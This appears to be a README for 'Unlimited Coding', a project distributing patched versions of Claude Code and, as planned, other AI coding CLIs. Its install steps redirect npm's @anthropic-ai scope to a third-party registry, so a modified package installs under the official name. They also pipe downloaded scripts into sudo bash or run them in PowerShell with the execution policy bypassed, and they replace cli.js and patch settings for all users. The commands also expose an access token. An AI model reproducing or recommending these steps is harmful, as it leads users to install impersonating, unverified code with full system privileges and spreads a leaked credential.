- Add Method A: npm registry install (recommended) - Move old installer to Method B (backup) - Update version badge to v2.1.62 Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
96 lines
3.1 KiB
Markdown
96 lines
3.1 KiB
Markdown
# Unlimited Coding
|
|
|
|
🌐 [English](README.md) | [Русский](README_ru.md) | [中文](README_zh.md) | [Español](README_es.md)
|
|
|
|
Patched AI coding tools for use with custom API endpoints.
|
|
|
|
## Products
|
|
|
|
| Folder | Tool | Status |
|
|
|--------|------|--------|
|
|
| [claude/](claude/) | Claude Code | Active (v2.1.62) |
|
|
| codex/ | OpenAI Codex CLI | Planned |
|
|
| gemini/ | Gemini CLI | Planned |
|
|
| qwen/ | Qwen Code | Planned |
|
|
| antigravity/ | Antigravity | Planned |
|
|
|
|
## Quick Start
|
|
|
|
See README in each product folder for details.
|
|
|
|
### Claude Code — Install
|
|
|
|
#### Method A — npm registry (recommended)
|
|
|
|
Install the patched package directly from our npm registry. Updates automatically when new versions are released.
|
|
|
|
**Linux / macOS:**
|
|
```bash
|
|
npm config set @anthropic-ai:registry https://npm.sensey24.ru/
|
|
npm install -g @anthropic-ai/claude-code
|
|
```
|
|
|
|
**Windows (PowerShell):**
|
|
```powershell
|
|
npm config set "@anthropic-ai:registry" "https://npm.sensey24.ru/"
|
|
npm install -g @anthropic-ai/claude-code
|
|
```
|
|
|
|
#### Method B — Automatic installer (backup)
|
|
|
|
All dependencies are installed automatically (git, python3, Node.js, Claude Code).
|
|
|
|
**Linux (Debian/Ubuntu/RHEL/Fedora):**
|
|
```bash
|
|
curl -fsSL -H "Authorization: token cadffcb0a6a3be728ac1ff619bb40c86588f6837" \
|
|
https://git.sensey24.ru/aibot777/unlimitedcoding/raw/branch/master/claude/uclaude_install.sh \
|
|
-o /tmp/uclaude.sh && sudo bash /tmp/uclaude.sh
|
|
```
|
|
|
|
**macOS:**
|
|
```bash
|
|
curl -fsSL -H "Authorization: token cadffcb0a6a3be728ac1ff619bb40c86588f6837" \
|
|
https://git.sensey24.ru/aibot777/unlimitedcoding/raw/branch/master/claude/uclaude_install.sh \
|
|
-o /tmp/uclaude.sh && bash /tmp/uclaude.sh
|
|
```
|
|
|
|
**Windows (PowerShell as Administrator):**
|
|
```powershell
|
|
git clone --depth 1 https://x-token:cadffcb0a6a3be728ac1ff619bb40c86588f6837@git.sensey24.ru/aibot777/unlimitedcoding.git
|
|
cd unlimitedcoding
|
|
powershell -ExecutionPolicy Bypass -File claude\uclaude_update.ps1 --force
|
|
```
|
|
|
|
### Manual Install (all platforms)
|
|
|
|
```bash
|
|
git clone --depth 1 https://x-token:cadffcb0a6a3be728ac1ff619bb40c86588f6837@git.sensey24.ru/aibot777/unlimitedcoding.git
|
|
cd unlimitedcoding
|
|
```
|
|
|
|
| Platform | Command |
|
|
|----------|---------|
|
|
| Linux | `sudo bash claude/uclaude_update.sh --force` |
|
|
| macOS | `bash claude/uclaude_update.sh --force` |
|
|
| Windows CMD | `claude\uclaude_update.bat --force` |
|
|
| Windows PowerShell | `powershell -ExecutionPolicy Bypass -File claude\uclaude_update.ps1 --force` |
|
|
|
|
### Update
|
|
|
|
| Platform | Command |
|
|
|----------|---------|
|
|
| Linux | `cd ~/unlimitedcoding && sudo bash claude/uclaude_update.sh` |
|
|
| macOS | `cd ~/unlimitedcoding && bash claude/uclaude_update.sh` |
|
|
| Windows | `cd %USERPROFILE%\unlimitedcoding && claude\uclaude_update.bat` |
|
|
|
|
## What Gets Installed Automatically
|
|
|
|
| Component | Linux | macOS | Windows |
|
|
|-----------|-------|-------|---------|
|
|
| Git | apt/dnf/yum | brew | winget |
|
|
| Python 3 | apt/dnf/yum | brew | winget |
|
|
| Node.js v24.13+ | nodesource | brew | winget |
|
|
| Claude Code | npm | npm | npm |
|
|
| Patched cli.js | replaced with backup | replaced with backup | replaced with backup |
|
|
| Settings | all users patched | all users patched | all users patched |
|